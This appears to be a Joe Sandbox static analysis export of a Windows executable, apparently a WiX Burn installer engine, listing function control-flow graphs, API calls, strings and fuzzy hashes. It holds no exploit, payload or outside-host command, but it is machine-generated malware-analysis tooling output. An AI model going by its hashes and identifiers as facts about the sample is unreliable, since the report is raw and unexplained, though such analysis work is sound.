                                                                                                                                                              control_flow_graph 921 7c5195-7c5243 call 7ef8e0 * 2 GetModuleHandleW call 8004f8 call 8006ae call 7c120a 932 7c5259-7c526a call 7c42d7 921->932 933 7c5245 921->933 939 7c526c-7c5271 932->939 940 7c5273-7c528f call 7c5618 CoInitializeEx 932->940 934 7c524a-7c5254 call 800237 933->934 941 7c54d4-7c54db 934->941 939->934 949 7c5298-7c52a4 call 7ffcae 940->949 950 7c5291-7c5296 940->950 943 7c54dd-7c54e3 call 805636 941->943 944 7c54e8-7c54ea 941->944 943->944 947 7c54ec-7c54f3 944->947 948 7c54fa-7c5518 call 7cd82f call 7da8d6 call 7dab24 944->948 947->948 951 7c54f5 call 7d41ec 947->951 970 7c551a-7c5522 948->970 971 7c5546-7c5559 call 7c4fa4 948->971 958 7c52b8-7c52c7 call 800e07 949->958 959 7c52a6 949->959 950->934 951->948 968 7c52c9-7c52ce 958->968 969 7c52d0-7c52df call 802af7 958->969 961 7c52ab-7c52b3 call 800237 959->961 961->941 968->961 977 7c52e8-7c52f7 call 803565 969->977 978 7c52e1-7c52e6 969->978 970->971 973 7c5524-7c5527 970->973 982 7c555b call 803a35 971->982 983 7c5560-7c5567 971->983 973->971 976 7c5529-7c5544 call 7d434c call 7c5602 973->976 976->971 993 7c52f9-7c52fe 977->993 994 7c5300-7c531f GetVersionExW 977->994 978->961 982->983 984 7c556e-7c5575 983->984 985 7c5569 call 802efe 983->985 990 7c557c-7c5583 984->990 991 7c5577 call 801479 984->991 985->984 998 7c558a-7c558c 990->998 999 7c5585 call 7ffdbd 990->999 991->990 993->961 995 7c5359-7c539e call 7c33c7 call 7c5602 994->995 996 7c5321-7c532b GetLastError 994->996 1023 7c53a0-7c53ab call 805636 995->1023 1024 7c53b1-7c53c1 call 7d752a 995->1024 1001 7c532d-7c5336 996->1001 1002 7c5338 996->1002 1005 7c558e CoUninitialize 998->1005 1006 7c5594-7c559b 998->1006 999->998 1001->1002 1007 7c533f-7c5354 call 7c3821 1002->1007 1008 7c533a 1002->1008 1005->1006 1010 7c559d-7c559f 1006->1010 1011 7c55d6-7c55df call 800113 1006->1011 1007->961 1008->1007 1015 7c55a5-7c55ab 1010->1015 1016 7c55a1-7c55a3 1010->1016 1021 7c55e6-7c55ff call 800802 call 7ee06f 1011->1021 1022 7c55e1 call 7c45ee 1011->1022 1020 7c55ad-7c55c6 call 7d3d85 call 7c5602 1015->1020 1016->1020 1020->1011 1039 7c55c8-7c55d5 call 7c5602 1020->1039 1022->1021 1023->1024 1035 7c53cd-7c53d6 1024->1035 1036 7c53c3 1024->1036 1040 7c53dc-7c53df 1035->1040 1041 7c549e-7c54ab call 7c4d39 1035->1041 1036->1035 1039->1011 1045 7c53e5-7c53e8 1040->1045 1046 7c5476-7c5492 call 7c4ae5 1040->1046 1047 7c54b0-7c54b4 1041->1047 1049 7c544e-7c546a call 7c48ef 1045->1049 1050 7c53ea-7c53ed 1045->1050 1053 7c54c0-7c54d2 1046->1053 1062 7c5494 1046->1062 1052 7c54b6 1047->1052 1047->1053 1049->1053 1064 7c546c 1049->1064 1055 7c53ef-7c53f2 1050->1055 1056 7c5426-7c5442 call 7c4a88 1050->1056 1052->1053 1053->941 1060 7c53f4-7c53f9 1055->1060 1061 7c5403-7c5416 call 7c4c86 1055->1061 1056->1053 1066 7c5444 1056->1066 1060->1061 1061->1053 1068 7c541c 1061->1068 1062->1041 1064->1046 1066->1049 1068->1056
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 007C5217
                                                                                                                                                                • Part of subcall function 008004F8: InitializeCriticalSection.KERNEL32(0082B5FC,?,007C5223,00000000,?,?,?,?,?,?), ref: 0080050F
                                                                                                                                                                • Part of subcall function 007C120A: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,007C523F,00000000,?), ref: 007C1248
                                                                                                                                                                • Part of subcall function 007C120A: GetLastError.KERNEL32(?,?,?,007C523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 007C1252
                                                                                                                                                              • CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 007C5285
                                                                                                                                                                • Part of subcall function 00800E07: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00800E28
                                                                                                                                                              • GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 007C5317
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 007C5321
                                                                                                                                                              • CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 007C558E
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to initialize Regutil., xrefs: 007C52C9
                                                                                                                                                              • Failed to initialize Wiutil., xrefs: 007C52E1
                                                                                                                                                              • Failed to initialize XML util., xrefs: 007C52F9
                                                                                                                                                              • 3.11.1.2318, xrefs: 007C5384
                                                                                                                                                              • Failed to initialize Cryputil., xrefs: 007C52A6
                                                                                                                                                              • Failed to initialize COM., xrefs: 007C5291
                                                                                                                                                              • Failed to initialize core., xrefs: 007C53C3
                                                                                                                                                              • Failed to get OS info., xrefs: 007C534F
                                                                                                                                                              • Invalid run mode., xrefs: 007C53F9
                                                                                                                                                              • Failed to run RunOnce mode., xrefs: 007C541C
                                                                                                                                                              • Failed to initialize engine state., xrefs: 007C526C
                                                                                                                                                              • Failed to run per-user mode., xrefs: 007C5494
                                                                                                                                                              • Failed to run embedded mode., xrefs: 007C5444
                                                                                                                                                              • engine.cpp, xrefs: 007C5345
                                                                                                                                                              • Failed to run untrusted mode., xrefs: 007C54B6
                                                                                                                                                              • Failed to parse command line., xrefs: 007C5245
                                                                                                                                                              • Failed to run per-machine mode., xrefs: 007C546C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
                                                                                                                                                              • String ID: 3.11.1.2318$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$engine.cpp
                                                                                                                                                              • API String ID: 3262001429-510904028
                                                                                                                                                              • Opcode ID: d0d04abf044953af5cf59e1c14e910eca43004d42c9a05711104ddd77108e2df
                                                                                                                                                              • Instruction ID: e5eb586815356ffa6ab04ee19ae78466694d0789943a20b5842a15bf7277d862
                                                                                                                                                              • Opcode Fuzzy Hash: d0d04abf044953af5cf59e1c14e910eca43004d42c9a05711104ddd77108e2df
                                                                                                                                                              • Instruction Fuzzy Hash: 3FB1A272D41A699BDB31AA64CC46FED77B5BF44310F00019DE908B6281DB7AAED0CF91
                                                                                                                                                              Function 0080304F Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 153libraryloadercomCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00803609,00000000,?,00000000), ref: 00803069
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,007EC025,?,007C5405,?,00000000,?), ref: 00803075
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 008030B5
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008030C1
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 008030CC
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008030D6
                                                                                                                                                              • CoCreateInstance.OLE32(0082B6B8,00000000,00000001,0080B818,?,?,?,?,?,?,?,?,?,?,?,007EC025), ref: 00803111
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 008031C0
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
                                                                                                                                                              • String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
                                                                                                                                                              • API String ID: 2124981135-499589564
                                                                                                                                                              • Opcode ID: 22143a4ce1d276a4aebed940009751f91706c94b652a02d5e398f8c5b2914b23
                                                                                                                                                              • Instruction ID: e6e0bdf9aa8dcf2b5965fd7befc771ef80271af7d614d52585144cf8e716c910
                                                                                                                                                              • Opcode Fuzzy Hash: 22143a4ce1d276a4aebed940009751f91706c94b652a02d5e398f8c5b2914b23
                                                                                                                                                              • Instruction Fuzzy Hash: D041AD31A02625AFDB649BA8CC55BAEB7ACFF48710F114169F901EB390DB71DE408B90
                                                                                                                                                              Function 007C1070 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 78fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007C33C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,007C10DD,?,00000000), ref: 007C33E8
                                                                                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 007C10F6
                                                                                                                                                                • Part of subcall function 007C1175: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,007C111A,cabinet.dll,00000009,?,?,00000000), ref: 007C1186
                                                                                                                                                                • Part of subcall function 007C1175: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,007C111A,cabinet.dll,00000009,?,?,00000000), ref: 007C1191
                                                                                                                                                                • Part of subcall function 007C1175: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 007C119F
                                                                                                                                                                • Part of subcall function 007C1175: GetLastError.KERNEL32(?,?,?,?,?,007C111A,cabinet.dll,00000009,?,?,00000000), ref: 007C11BA
                                                                                                                                                                • Part of subcall function 007C1175: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 007C11C2
                                                                                                                                                                • Part of subcall function 007C1175: GetLastError.KERNEL32(?,?,?,?,?,007C111A,cabinet.dll,00000009,?,?,00000000), ref: 007C11D7
                                                                                                                                                              • CloseHandle.KERNELBASE(?,?,?,?,0080B4D0,?,cabinet.dll,00000009,?,?,00000000), ref: 007C1131
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
                                                                                                                                                              • String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
                                                                                                                                                              • API String ID: 3687706282-3151496603
                                                                                                                                                              • Opcode ID: 3f22433d6f079d798591120f9cf4dc85fb98cd784df41215411f6658f19739b9
                                                                                                                                                              • Instruction ID: 171b361592548955f0a7e9b839bcffd519c4097e5a0012b0f25ce8ce0e175497
                                                                                                                                                              • Opcode Fuzzy Hash: 3f22433d6f079d798591120f9cf4dc85fb98cd784df41215411f6658f19739b9
                                                                                                                                                              • Instruction Fuzzy Hash: A0215E7190061CABDB509FA4DC49FDEBBB8FF0A710F54412DEA10B7282D77899088BA4
                                                                                                                                                              Function 007DA0BB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • Failed create working folder., xrefs: 007DA0EE
                                                                                                                                                              • Failed to copy working folder., xrefs: 007DA116
                                                                                                                                                              • Failed to calculate working folder to ensure it exists., xrefs: 007DA0D8
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CurrentDirectoryErrorLastProcessWindows
                                                                                                                                                              • String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
                                                                                                                                                              • API String ID: 3841436932-2072961686
                                                                                                                                                              • Opcode ID: d9d3003e740463102d9e08a891ec54ae69dd47c1c00b128628dd542d4951f891
                                                                                                                                                              • Instruction ID: 40bf1642418a047810f84426ed42863f4661b437b4eb4bf3464e2c4f3ff7e5b6
                                                                                                                                                              • Opcode Fuzzy Hash: d9d3003e740463102d9e08a891ec54ae69dd47c1c00b128628dd542d4951f891
                                                                                                                                                              • Instruction Fuzzy Hash: 1001843290552CFB8B225A55DC07C9EBB79FF54B20B104256F800BA311EB3E9E50E692
                                                                                                                                                              Function 007F48D8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,007F48AE,00000000,00827F08,0000000C,007F4A05,00000000,00000002,00000000), ref: 007F48F9
                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,007F48AE,00000000,00827F08,0000000C,007F4A05,00000000,00000002,00000000), ref: 007F4900
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 007F4912
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                              • Opcode ID: 5c0032e45dd9c97023a91d7f86e4dc67da81cdcd06ddb3d3865ca21c120caaec
                                                                                                                                                              • Instruction ID: 70ce92c7e7179b809b89a3b0f4f5b43231084f435743310dd1b7a15c4d559672
                                                                                                                                                              • Opcode Fuzzy Hash: 5c0032e45dd9c97023a91d7f86e4dc67da81cdcd06ddb3d3865ca21c120caaec
                                                                                                                                                              • Instruction Fuzzy Hash: 2BE0B63150024CABCF51AFA4DD0DA6A3B69FF45781B104014FA298A322CB79ED52CA90
                                                                                                                                                              Function 007C394F Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$AllocateProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1357844191-0
                                                                                                                                                              • Opcode ID: e50b6e0d6e6635cd68b618e940fe68ee4fad15d6f040e88e658c716a9d27de17
                                                                                                                                                              • Instruction ID: 45cdcfb4e3239d7a6d2cfee80b35d3b65a28d99a1bf38f122646a8f0b5efc851
                                                                                                                                                              • Opcode Fuzzy Hash: e50b6e0d6e6635cd68b618e940fe68ee4fad15d6f040e88e658c716a9d27de17
                                                                                                                                                              • Instruction Fuzzy Hash: A9C012321A420CABCB406FF8EC0EC9A3BACBB286027048410B905C3120C738E0108B60
                                                                                                                                                              Function 007CDF33 Relevance: 128.4, APIs: 11, Strings: 62, Instructions: 646COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 007CE058
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 007CE736
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeHeapString$AllocateProcess
                                                                                                                                                              • String ID: Cache$CacheId$Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage$ET|$ExePackage$Failed to allocate memory for MSP patch sequence information.$Failed to allocate memory for package structs.$Failed to allocate memory for patch sequence information to package lookup.$Failed to allocate memory for rollback boundary structs.$Failed to find backward transaction boundary: %ls$Failed to find forward transaction boundary: %ls$Failed to get @Cache.$Failed to get @CacheId.$Failed to get @Id.$Failed to get @InstallCondition.$Failed to get @InstallSize.$Failed to get @LogPathVariable.$Failed to get @PerMachine.$Failed to get @Permanent.$Failed to get @RollbackBoundaryBackward.$Failed to get @RollbackBoundaryForward.$Failed to get @RollbackLogPathVariable.$Failed to get @Size.$Failed to get @Vital.$Failed to get next node.$Failed to get package node count.$Failed to get rollback bundary node count.$Failed to parse EXE package.$Failed to parse MSI package.$Failed to parse MSP package.$Failed to parse MSU package.$Failed to parse dependency providers.$Failed to parse payload references.$Failed to parse target product codes.$Failed to select package nodes.$Failed to select rollback boundary nodes.$InstallCondition$InstallSize$Invalid cache type: %ls$LogPathVariable$MsiPackage$MspPackage$MsuPackage$PerMachine$Permanent$RollbackBoundary$RollbackBoundaryBackward$RollbackBoundaryForward$RollbackLogPathVariable$Size$Vital$`<u$always$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msi.dll$package.cpp$wininet.dll$yes
                                                                                                                                                              • API String ID: 336948655-2453070193
                                                                                                                                                              • Opcode ID: a04e0154df55b53a463854f151327e258f954e86720d00a6d49d11304d0fa49c
                                                                                                                                                              • Instruction ID: cc0d9196e6d7ca89711449d93efdae49da9fa8325e21bd7d7f5ba8de811c81fe
                                                                                                                                                              • Opcode Fuzzy Hash: a04e0154df55b53a463854f151327e258f954e86720d00a6d49d11304d0fa49c
                                                                                                                                                              • Instruction Fuzzy Hash: 47329131D40225EBDB219B54CC46FAEB7A8FF14720F11426DF921FB291D7B8AD809B90
                                                                                                                                                              Function 007CF9E3 Relevance: 117.7, APIs: 3, Strings: 64, Instructions: 446COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 222 7cf9e3-7cfa14 call 8039af 225 7cfa18-7cfa1a 222->225 226 7cfa16 222->226 227 7cfa1c-7cfa29 call 800237 225->227 228 7cfa2e-7cfa47 call 8032f3 225->228 226->225 233 7cff16-7cff1b 227->233 234 7cfa49-7cfa4e 228->234 235 7cfa53-7cfa68 call 8032f3 228->235 238 7cff1d-7cff1f 233->238 239 7cff23-7cff28 233->239 236 7cff0d-7cff14 call 800237 234->236 246 7cfa6a-7cfa6f 235->246 247 7cfa74-7cfa81 call 7cea42 235->247 252 7cff15 236->252 238->239 240 7cff2a-7cff2c 239->240 241 7cff30-7cff35 239->241 240->241 244 7cff3d-7cff41 241->244 245 7cff37-7cff39 241->245 249 7cff4b-7cff52 244->249 250 7cff43-7cff46 call 805636 244->250 245->244 246->236 255 7cfa8d-7cfaa2 call 8032f3 247->255 256 7cfa83-7cfa88 247->256 250->249 252->233 259 7cfaae-7cfac0 call 804c97 255->259 260 7cfaa4-7cfaa9 255->260 256->236 263 7cfacf-7cfae4 call 8032f3 259->263 264 7cfac2-7cfaca 259->264 260->236 269 7cfae6-7cfaeb 263->269 270 7cfaf0-7cfb05 call 8032f3 263->270 265 7cfd99-7cfda2 call 800237 264->265 265->252 269->236 274 7cfb07-7cfb0c 270->274 275 7cfb11-7cfb23 call 803505 270->275 274->236 278 7cfb2f-7cfb45 call 8039af 275->278 279 7cfb25-7cfb2a 275->279 282 7cfb4b-7cfb4d 278->282 283 7cfdf4-7cfe0e call 7cecbe 278->283 279->236 284 7cfb4f-7cfb54 282->284 285 7cfb59-7cfb6e call 803505 282->285 290 7cfe1a-7cfe32 call 8039af 283->290 291 7cfe10-7cfe15 283->291 284->236 292 7cfb7a-7cfb8f call 8032f3 285->292 293 7cfb70-7cfb75 285->293 298 7cfefc-7cfefd call 7cf0f8 290->298 299 7cfe38-7cfe3a 290->299 291->236 301 7cfb9f-7cfbb4 call 8032f3 292->301 302 7cfb91-7cfb93 292->302 293->236 305 7cff02-7cff06 298->305 303 7cfe3c-7cfe41 299->303 304 7cfe46-7cfe64 call 8032f3 299->304 312 7cfbc4-7cfbd9 call 8032f3 301->312 313 7cfbb6-7cfbb8 301->313 302->301 306 7cfb95-7cfb9a 302->306 303->236 314 7cfe66-7cfe6b 304->314 315 7cfe70-7cfe88 call 8032f3 304->315 305->252 311 7cff08 305->311 306->236 311->236 323 7cfbe9-7cfbfe call 8032f3 312->323 324 7cfbdb-7cfbdd 312->324 313->312 316 7cfbba-7cfbbf 313->316 314->236 321 7cfe8a-7cfe8c 315->321 322 7cfe95-7cfead call 8032f3 315->322 316->236 321->322 325 7cfe8e-7cfe93 321->325 331 7cfeaf-7cfeb1 322->331 332 7cfeba-7cfed2 call 8032f3 322->332 333 7cfc0e-7cfc23 call 8032f3 323->333 334 7cfc00-7cfc02 323->334 324->323 326 7cfbdf-7cfbe4 324->326 325->236 326->236 331->332 335 7cfeb3-7cfeb8 331->335 343 7cfedb-7cfef3 call 8032f3 332->343 344 7cfed4-7cfed9 332->344 341 7cfc25-7cfc27 333->341 342 7cfc33-7cfc48 call 8032f3 333->342 334->333 336 7cfc04-7cfc09 334->336 335->236 336->236 341->342 345 7cfc29-7cfc2e 341->345 351 7cfc58-7cfc6d call 8032f3 342->351 352 7cfc4a-7cfc4c 342->352 343->298 350 7cfef5-7cfefa 343->350 344->236 345->236 350->236 356 7cfc7d-7cfc92 call 8032f3 351->356 357 7cfc6f-7cfc71 351->357 352->351 353 7cfc4e-7cfc53 352->353 353->236 361 7cfc94-7cfc96 356->361 362 7cfca2-7cfcba call 8032f3 356->362 357->356 358 7cfc73-7cfc78 357->358 358->236 361->362 363 7cfc98-7cfc9d 361->363 366 7cfcbc-7cfcbe 362->366 367 7cfcca-7cfce2 call 8032f3 362->367 363->236 366->367 368 7cfcc0-7cfcc5 366->368 371 7cfce4-7cfce6 367->371 372 7cfcf2-7cfd07 call 8032f3 367->372 368->236 371->372 373 7cfce8-7cfced 371->373 376 7cfd0d-7cfd2a CompareStringW 372->376 377 7cfda7-7cfda9 372->377 373->236 380 7cfd2c-7cfd32 376->380 381 7cfd34-7cfd49 CompareStringW 376->381 378 7cfdab-7cfdb2 377->378 379 7cfdb4-7cfdb6 377->379 378->379 385 7cfdb8-7cfdbd 379->385 386 7cfdc2-7cfdda call 803505 379->386 382 7cfd75-7cfd7a 380->382 383 7cfd4b-7cfd55 381->383 384 7cfd57-7cfd6c CompareStringW 381->384 382->379 383->382 388 7cfd7c-7cfd94 call 7c3821 384->388 389 7cfd6e 384->389 385->236 386->283 392 7cfddc-7cfdde 386->392 388->265 389->382 394 7cfdea 392->394 395 7cfde0-7cfde5 392->395 394->283 395->236
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: StringVariant$AllocClearFreeInit
